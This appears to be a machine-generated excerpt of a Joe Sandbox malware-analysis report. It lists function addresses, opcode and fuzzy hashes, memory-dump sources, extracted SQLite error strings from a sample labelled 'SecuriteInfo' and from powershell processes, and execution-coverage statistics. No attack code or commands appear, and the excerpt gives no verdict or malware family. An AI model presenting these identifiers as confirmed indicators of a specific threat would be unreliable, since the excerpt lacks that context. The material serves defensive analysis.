                                                            • Opcode ID: d27bf61ee4a98634d4261b76ce9cd54fc1edece76dedd19c8bdc2d1968ee5d44
                                                            • Instruction ID: 9140a29bdefaf646629f5105ecacf989b342c8034177e9a7d4b27b4496e70e62
                                                            • Opcode Fuzzy Hash: d27bf61ee4a98634d4261b76ce9cd54fc1edece76dedd19c8bdc2d1968ee5d44
                                                            • Instruction Fuzzy Hash: E7912232A08E4282EA559FA5DC8477C23A1FB48BD6F544431CA2E437A4DF7DE885D382
                                                            Function 00007FF8E751697C Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1773292284.00007FF8E7511000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8E7510000, based on PE: true
                                                            • Associated: 00000002.00000002.1773243251.00007FF8E7510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E7528000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E752E000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773423131.00007FF8E7530000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773459694.00007FF8E7532000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff8e7510000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: 00007F906026
                                                            • String ID: delete$insert$replace$update
                                                            • API String ID: 4164062812-310407209
                                                            • Opcode ID: 7c604190ea982bc6862ef712fed7f76d342510ff7bfb9a8620637aef0df7eee1
                                                            • Instruction ID: 37bb5a7b084d46ca6d318e0427280a944d54d05db5c53a322809c3855e77b930
                                                            • Opcode Fuzzy Hash: 7c604190ea982bc6862ef712fed7f76d342510ff7bfb9a8620637aef0df7eee1
                                                            • Instruction Fuzzy Hash: C921BF61A08E5382FB608F66EC1033C27A1EF41FC3F48407AC96D4A68ADE2CE556C342
                                                            Function 00007FF8E75169D9 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1773292284.00007FF8E7511000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8E7510000, based on PE: true
                                                            • Associated: 00000002.00000002.1773243251.00007FF8E7510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E7528000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E752E000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773423131.00007FF8E7530000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773459694.00007FF8E7532000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff8e7510000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: 00007F906026
                                                            • String ID: delete$insert$replace$update
                                                            • API String ID: 4164062812-310407209
                                                            • Opcode ID: 55d76c71ca6707038f4485d3968fe73a8d602063b72aba7a2a39815a21053d33
                                                            • Instruction ID: 98bb43d7016d874bd7430881f62fa05007c603120fc640c1d6ad16f06cc8e3a6
                                                            • Opcode Fuzzy Hash: 55d76c71ca6707038f4485d3968fe73a8d602063b72aba7a2a39815a21053d33
                                                            • Instruction Fuzzy Hash: BD219C61A08E5382FA608B55EC1033C2791EF41BC3F488076C9AD4B68ADE2DE656C342
                                                            Function 00007FF8E7516910 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1773292284.00007FF8E7511000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8E7510000, based on PE: true
                                                            • Associated: 00000002.00000002.1773243251.00007FF8E7510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E7528000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E752E000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773423131.00007FF8E7530000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773459694.00007FF8E7532000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff8e7510000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: 00007F906026
                                                            • String ID: delete$insert$replace$update
                                                            • API String ID: 4164062812-310407209
                                                            • Opcode ID: 25b7c0b31f0d2a560fd390b79b5b474fca991390d289ae70a164b8cd878f4644
                                                            • Instruction ID: becf754b2eb8f3d24fabbc0da5e3af760cd7071907c7cb5798284282048bb629
                                                            • Opcode Fuzzy Hash: 25b7c0b31f0d2a560fd390b79b5b474fca991390d289ae70a164b8cd878f4644
                                                            • Instruction Fuzzy Hash: BD116A24A08E1382FA608B52EC4033D27A4AF44FC3F54443ACD6D8A695EF2CE656C342
                                                            Function 00007FF8E7517900 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 185COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1773292284.00007FF8E7511000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8E7510000, based on PE: true
                                                            • Associated: 00000002.00000002.1773243251.00007FF8E7510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E7528000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E752E000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773423131.00007FF8E7530000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773459694.00007FF8E7532000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff8e7510000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: 00007
                                                            • String ID: Base Connection.__init__ not called.$Base Cursor.__init__ not called.$Cannot operate on a closed cursor.$Cannot operate on a closed database.$Recursive use of cursors not allowed.$SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu.
                                                            • API String ID: 3568877910-2922342969
                                                            • Opcode ID: b2c2694dadf35b8f66a47485a1d86f397de167e51834a5e6fdf4c519bbf6613e
                                                            • Instruction ID: 1d8eeb3bc23b3276f72b4791b3b6b55e21bb410bdd07c03c94d42a611eded37c
                                                            • Opcode Fuzzy Hash: b2c2694dadf35b8f66a47485a1d86f397de167e51834a5e6fdf4c519bbf6613e
                                                            • Instruction Fuzzy Hash: E0910632A09E4281EB548FA9DC5437C67A0FB85BD7F240835CA2E476A4DF3DE985C342
                                                            Function 00007FF8E7518FD0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 168COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • Cannot operate on a closed database., xrefs: 00007FF8E7519173
                                                            • Base Connection.__init__ not called., xrefs: 00007FF8E751910C
                                                            • SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu., xrefs: 00007FF8E75191B1
                                                            • factory must return a cursor, not %.100s, xrefs: 00007FF8E75190C3
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1773292284.00007FF8E7511000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8E7510000, based on PE: true
                                                            • Associated: 00000002.00000002.1773243251.00007FF8E7510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E7528000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E752E000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773423131.00007FF8E7530000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773459694.00007FF8E7532000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff8e7510000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Base Connection.__init__ not called.$Cannot operate on a closed database.$SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu.$factory must return a cursor, not %.100s
                                                            • API String ID: 0-2953218143
                                                            • Opcode ID: 25cc7f2b8a872ceb47122164e428b0963f60e66b2714bfe679bedf1994e22dde
                                                            • Instruction ID: 3399b5a6eabd1dbb630675074220f773c9d165406869e547b934932b76ca8552
                                                            • Opcode Fuzzy Hash: 25cc7f2b8a872ceb47122164e428b0963f60e66b2714bfe679bedf1994e22dde
                                                            • Instruction Fuzzy Hash: 4F713436A09E83C6EA549FA6DC8423C63A0FB45FD6B244431CE2E03794DF3DE8858342
                                                            Function 00007FF8E754FB28 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 87COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1773557891.00007FF8E7541000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF8E7540000, based on PE: true
                                                            • Associated: 00000002.00000002.1773494525.00007FF8E7540000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773557891.00007FF8E755C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773557891.00007FF8E7564000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773557891.00007FF8E7569000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773687913.00007FF8E756A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773719902.00007FF8E756C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff8e7540000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: 00007E7637
                                                            • String ID: Invalid filter ID: %llu$dict_size$dist$start_offset
                                                            • API String ID: 4629914-3368833446
                                                            • Opcode ID: 70732c878d185871e83d032ed88e66c35bf329b642db62c29c46d98ad4e53224
                                                            • Instruction ID: 13cdc2c312b28bb2979b4f28c0489e14533a165d0ce36e9a95eb74fe88f0c488
                                                            • Opcode Fuzzy Hash: 70732c878d185871e83d032ed88e66c35bf329b642db62c29c46d98ad4e53224
                                                            • Instruction Fuzzy Hash: 6E41F131A08EC381EA648B99ED4427C23A1BF057D4B185631CA3E476E0EF3DF4A59703
                                                            Function 00007FF8E75175B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1773292284.00007FF8E7511000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8E7510000, based on PE: true
                                                            • Associated: 00000002.00000002.1773243251.00007FF8E7510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E7528000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E752E000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773423131.00007FF8E7530000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                            • Associated: 00000002.00000002.1773459694.00007FF8E7532000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff8e7510000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: 00007
                                                            • String ID: COMMIT$query string is too large
                                                            • API String ID: 3568877910-2709575789
                                                            • Opcode ID: 35e193ac2c27ee0a438aa9099ef1b5c24edca56c53d06f0d483d03152d3b0d49
                                                            • Instruction ID: d8a0c37c0e5947927b54a5dbff25c4b637d0b0b30cc6c2c495d546349a2620a0
                                                            • Opcode Fuzzy Hash: 35e193ac2c27ee0a438aa9099ef1b5c24edca56c53d06f0d483d03152d3b0d49
                                                            • Instruction Fuzzy Hash: 10418262A18E8386EB009B6AEC4436D63A0FB88FD6F250935DE6D47764DF3CD446C701

                                                            Executed Functions

                                                            Function 00007FF886B63027 Relevance: 1.0, Instructions: 978COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1568092867.00007FF886B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886B60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7ff886b60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d44be64a142c6ea01ed3a135aa2af10db9fe74c9987c6fbde355cd1f4667f755
                                                            • Instruction ID: f6d2175e42e7edf3819c0a9a9b62a13caa299b6af7e4edc754d31c512fdafcfd
                                                            • Opcode Fuzzy Hash: d44be64a142c6ea01ed3a135aa2af10db9fe74c9987c6fbde355cd1f4667f755
                                                            • Instruction Fuzzy Hash: 9B524822E0DB894FE396976C58656B07BE1FF96668B0911FBC04DC71D3DD19AC0AC382
                                                            Function 00007FF88697E620 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1565732494.00007FF88697D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88697D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7ff88697d000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: xrw
                                                            • API String ID: 0-1467674462
                                                            • Opcode ID: 2ee2c04fceb4678cdf62b5a927adab4f6d20401011597e3d4edd18b41d6cf06a
                                                            • Instruction ID: f6da1b7dcc59fee5b09cdfa05bc5b15dec080d04595c3bea7f9018fb903c209a
                                                            • Opcode Fuzzy Hash: 2ee2c04fceb4678cdf62b5a927adab4f6d20401011597e3d4edd18b41d6cf06a
                                                            • Instruction Fuzzy Hash: 4041E27180DBC44FE7569B29AC499523FF0FF56260B1505EFD088CB1A3D625AC4AC7A2
                                                            Function 00007FF886A9A1F3 Relevance: .4, Instructions: 415COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1567032813.00007FF886A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7ff886a90000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 43a25550f4790b8daafb421de24780d817db49343e96db25b3c947fb2f93c63a
                                                            • Instruction ID: c42b64c3cee67936ac7dc550025de145701cabea20ff63808354eba81683bf4c
                                                            • Opcode Fuzzy Hash: 43a25550f4790b8daafb421de24780d817db49343e96db25b3c947fb2f93c63a
                                                            • Instruction Fuzzy Hash: 821146A580E7C88FD7438B345C651907FB0EE67240B1A00EBD599CF1B3E9285D09C7A2
                                                            Function 00007FF886B634A6 Relevance: .3, Instructions: 257COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1568092867.00007FF886B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886B60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7ff886b60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f081930938a2a72a0fddc5be5ab5a600e29b92c5afdda89991e7bbebd893849a
                                                            • Instruction ID: c689271cbf4bfb001187a7c4921e79efc8c0d8cfc33b34a31d0576aadf16c8e7
                                                            • Opcode Fuzzy Hash: f081930938a2a72a0fddc5be5ab5a600e29b92c5afdda89991e7bbebd893849a
                                                            • Instruction Fuzzy Hash: 07710561D0DBCA4FE3A69A2C58555717BE1FF96798B0912FBC04CCB293DD19AC0AC342
                                                            Function 00007FF886A99870 Relevance: .1, Instructions: 134COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1567032813.00007FF886A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7ff886a90000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e33df761e2510ceb3a5566eaeeaebbf5aa400357123dcf533b4a7317277506c2
                                                            • Instruction ID: 1c8771e6498c310f318bb4f40ca1568c6e16646532e2b16b688392fd67176393
                                                            • Opcode Fuzzy Hash: e33df761e2510ceb3a5566eaeeaebbf5aa400357123dcf533b4a7317277506c2
                                                            • Instruction Fuzzy Hash: 3741FB3191CB888FDB1C9B5CAC066F97BE0FB59711F04416FE459D3252DA60AC55CBC2
                                                            Function 00007FF886A9A8EC Relevance: .1, Instructions: 119COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1567032813.00007FF886A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7ff886a90000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 00d59b938f6b5406dd42ed6de130c1e623fecd0b0748a2793e9ebd6495de6ac5
                                                            • Instruction ID: d8afd131992ffce4037c391cf1d61fc22f3a3fd082ada76e0aafc42040472983
                                                            • Opcode Fuzzy Hash: 00d59b938f6b5406dd42ed6de130c1e623fecd0b0748a2793e9ebd6495de6ac5
                                                            • Instruction Fuzzy Hash: 1431267190CB8C8FDB59DB68984A6E97FE0EBA6320F04416FD059C7193DA645C06CB92
                                                            Function 00007FF886A9A8C6 Relevance: .1, Instructions: 99COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1567032813.00007FF886A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7ff886a90000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 70f976536713f32d1e5d51852589fed7ba758c9fe94e07d1a5afcb6aec078fd9
                                                            • Instruction ID: 495de667de6a3417a6be0caae08b088a90dcd593b681e59e81faebfff9eccd02
                                                            • Opcode Fuzzy Hash: 70f976536713f32d1e5d51852589fed7ba758c9fe94e07d1a5afcb6aec078fd9
                                                            • Instruction Fuzzy Hash: 9721F53190CA8C8FEB58DB58984A7F97BE0EB95320F04416FD04DC7152D6249816CB82
                                                            Function 00007FF886B66A0E Relevance: .1, Instructions: 60COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1568092867.00007FF886B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886B60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7ff886b60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3d0fab8fd86e3885c3eb12336b6016ffb9c360f5a4c31df689d476e39ee311c6
                                                            • Instruction ID: 786ed2bf715cd537910af6e890515aa9658ef880f9c55b8ed6b6b0e16e96f545
                                                            • Opcode Fuzzy Hash: 3d0fab8fd86e3885c3eb12336b6016ffb9c360f5a4c31df689d476e39ee311c6
                                                            • Instruction Fuzzy Hash: 2C112532E0D6898FE755DB9890906B87BE1FF49358F1841BEC04ED7183EA28AC05C352
                                                            Function 00007FF886A933B5 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1567032813.00007FF886A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7ff886a90000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 416d78af615282d572b3a414326c95b602a4a0825e38525b723d7405b764b34a
                                                            • Instruction ID: 15a7cca56222728b8e08f6c3a04cae867539d58593e020daa03eaad3825491ac
                                                            • Opcode Fuzzy Hash: 416d78af615282d572b3a414326c95b602a4a0825e38525b723d7405b764b34a
                                                            • Instruction Fuzzy Hash: 8901677115CB0C8FD744EF0CE451AA6B7E0FB95364F10056DE58AC3651DB36E882CB46
                                                            Function 00007FF886B6432D Relevance: .0, Instructions: 37COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1568092867.00007FF886B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886B60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7ff886b60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5aa9a59cf23d9b72d11795ff97779c3fe517e954e06c9db0c98be7917355dfd0
                                                            • Instruction ID: 45e03d5ef35a9c7ab944477ac90b3529c22abaf0ef818d24fdaba2016320eae5
                                                            • Opcode Fuzzy Hash: 5aa9a59cf23d9b72d11795ff97779c3fe517e954e06c9db0c98be7917355dfd0
                                                            • Instruction Fuzzy Hash: 36F0BE32A0C9458FE668EA4CE4414E873E0FF49334B1540BAE10DC71A3CB29FC45C741
                                                            Function 00007FF886B645E0 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1568092867.00007FF886B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886B60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7ff886b60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 064a8afc7f1db6f7aef213b37023d68a1e6cb4f55a6f8d3a1e697cba34a8865a
                                                            • Instruction ID: ccc46ea1742961e368c40fbcdef73ff0725220ab0f00be94d42dae7f475f885d
                                                            • Opcode Fuzzy Hash: 064a8afc7f1db6f7aef213b37023d68a1e6cb4f55a6f8d3a1e697cba34a8865a
                                                            • Instruction Fuzzy Hash: ECF05832A0D9448FEB98EA5CE4419E877E0FF06364B1540F6E109CB1A3DB2AAC48C781

                                                            Executed Functions

                                                            Function 00007FF886AB4DC5 Relevance: .2, Instructions: 220COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000002D.00000002.1623539785.00007FF886AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886AB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_45_2_7ff886ab0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 27ed7bebd3746532e288c3d94708ac522ff752c67de9253ed378b4d84249780f
                                                            • Instruction ID: 5c3c7afe714a0839a22c617f3eba7e1599d03a61477a083aff16df57a1f41a9e
                                                            • Opcode Fuzzy Hash: 27ed7bebd3746532e288c3d94708ac522ff752c67de9253ed378b4d84249780f
                                                            • Instruction Fuzzy Hash: 9F71C130E09A598FDB55EBACD8966ECBBF1FF4A710F1441AED04DD7292CA256C02CB41
                                                            Function 00007FF886B81863 Relevance: .1, Instructions: 149COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000002D.00000002.1624259228.00007FF886B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886B80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_45_2_7ff886b80000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 81dd04935e34dd35e11f850fa6467e5550741c328f38e777a9d331f5a3d05204
                                                            • Instruction ID: defc7a30f54d341730fa9256d007c2025cb308bf25dfb048479fe6effed4ae0e
                                                            • Opcode Fuzzy Hash: 81dd04935e34dd35e11f850fa6467e5550741c328f38e777a9d331f5a3d05204
                                                            • Instruction Fuzzy Hash: 48410822B2DE0B4FE7A99A5C64516B973D2FF852A4F08017BC00EC7187EE18AC16C281
                                                            Function 00007FF886B81AEE Relevance: .1, Instructions: 135COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000002D.00000002.1624259228.00007FF886B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886B80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_45_2_7ff886b80000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 07d02053fea609acf89261f7f159d0cb975c311f82c55e93bd53798216769de2
                                                            • Instruction ID: d1882cc202b73303c810692b6c258ae20bffefb27fd7c4f0b84ab1a4d0d36e22
                                                            • Opcode Fuzzy Hash: 07d02053fea609acf89261f7f159d0cb975c311f82c55e93bd53798216769de2
                                                            • Instruction Fuzzy Hash: 5841B631E2E95A4FEBB99A6C54516F973D2FF447D4B5801BAC00EC7286FE18AC11C382
                                                            Function 00007FF886AB3945 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000002D.00000002.1623539785.00007FF886AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886AB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_45_2_7ff886ab0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a73a21c3248a198af1e89a2b13eb8794bbde26503cfb4fc4cfb7fcdcadaf0afc
                                                            • Instruction ID: dd9f7eb0577aa014d3bba51f393b604e51db529caeb4dd50848408c206dbb056
                                                            • Opcode Fuzzy Hash: a73a21c3248a198af1e89a2b13eb8794bbde26503cfb4fc4cfb7fcdcadaf0afc
                                                            • Instruction Fuzzy Hash: 9701677115CB0C4FD744EF0CE451AA5B7E0FB95364F10056DE58AC3651DB36E881CB46

                                                            Non-executed Functions

                                                            Function 00007FF886AB02AD Relevance: 5.2, Strings: 4, Instructions: 227COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000002D.00000002.1623539785.00007FF886AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886AB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_45_2_7ff886ab0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: dZ$@z<$PM.$^
                                                            • API String ID: 0-922983480
                                                            • Opcode ID: 1e5f68f7517273994ffd7aa13481cbf54e3c2e9914abf56f4ca37fff9174ce63
                                                            • Instruction ID: 584bd438b1a6393c410d150073e55a1a2bb1eb0b77f90eaa14a653284c60349a
                                                            • Opcode Fuzzy Hash: 1e5f68f7517273994ffd7aa13481cbf54e3c2e9914abf56f4ca37fff9174ce63
                                                            • Instruction Fuzzy Hash: F261D752D0E9D15BF2664568385A2B9AFA0FF527A4F9C40FBC18C6B0DFEC45DC198381

                                                            Execution Graph

                                                            Execution Coverage:7.9%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:0.5%
                                                            Total number of Nodes:1244
                                                            Total number of Limit Nodes:37
